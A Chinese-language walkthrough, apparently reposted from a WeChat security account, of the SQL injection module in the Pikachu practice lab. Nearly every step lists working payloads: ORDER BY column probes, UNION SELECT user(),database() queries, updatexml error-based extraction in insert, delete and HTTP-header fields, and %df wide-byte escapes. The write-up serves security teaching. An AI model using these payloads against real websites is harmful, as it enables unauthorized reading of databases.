本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解
原文学习链接
CSDN博主:One_Blanks
主页地址:https://blog.csdn.net/NPSM_?type=blog
一、数字型注入(post)
1、 burp 抓包
2、 order by探测列表数
order by 2 #查询数据库列,数字 2 是字段的索引、从1开始计数
3、 union查询数据库、数据库用户
id=2 union select user(),database()–+
# union联合查询
# select user(), database() 返回当前数据库用户,返回当前数据库名称
# –+ 注释符 不知道后面有什么会写什么所以就注释掉
二、字符型注入(get)
1、输入框引起报错
2、order by探测列表数
' order by 3#
' order by 2#
# 查询列数
3、 union查询数据库、数据库用户
' union select user(),database()#
# union联合查询
# select user(), database() 返回当前数据库用户,返回当前数据库名称
# –+ 注释符 不知道后面有什么会写什么所以就注释掉
三、搜索型注入
1、 输入框引起报错
2、 order by探测列表数
' order by 3#
' order by 4#
3、 union查询用户信息
' union select user(),database(),3#
# union联合查询
# select user(), database() 返回当前数据库用户,返回当前数据库名称
# # 注释符 不知道后面有什么会写什么所以就注释掉
四、 xx型注入
1、 输入框引起报错
2、 order by探测列表数
') order by 2#
') order by 3#
3、 union查询用户信息
') union select user(),database()#
五、"insert/update"注入
1、 打开注册信息
2、 输入框引起报错
3、 构建updateXML语句
x' or updatexml(1,concat(0x7e,database()),0) or '#
# x' or 闭合任何前置的单引号
# updatexml(1, 用于更新 XML 数据
# concat(0x7e, 将 ~(十六进制 0x7e)与当前数据库名称连接起来。
# database()) 返回当前使用的数据库名称
六、 delete注入
1、 burp suite 抓删除数据的包
2、 burp suite 修改数据包
3、 构建注入语句,并发送数据包
id=1+or+updatexml(1,concat(0x7e,database()),0)
七、 http头注入
1、 burp suite 抓包
2、 burp suite 改包 单引号测试报错
3、 构建注入语句,并发送数据包
' or+updatexml(1,concat(0x7e,database()),0) or '
# 'or 开始逻辑or条件
# updatexml 用于更新 XML 数据
# concat(0x7e,database()) 将~转换16进制与当前数据库名称连接起来
# or' 结束逻辑or条件
八.九、盲注
有个关于盲注的便捷方法,就是使用bp设置两个参数变量,设置好字典让bp自己去跑.
十、宽字节注入
1、 输入框引起报错
2、 burp 抓包
3、 burp加入url编码,并发包
kobe%df'+or+1=1#
# %df: 这是 URL 编码的 %df,解码后是 ß
# +or+1=1 逻辑运算符 1=1为真
# 注释符
# 原理: ’+%df=運’ %df会消除反斜杠 变成一个可以实现闭合的字符
原文始发于微信公众号(泷羽SEC-ohh):pikachu靶机-sql注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论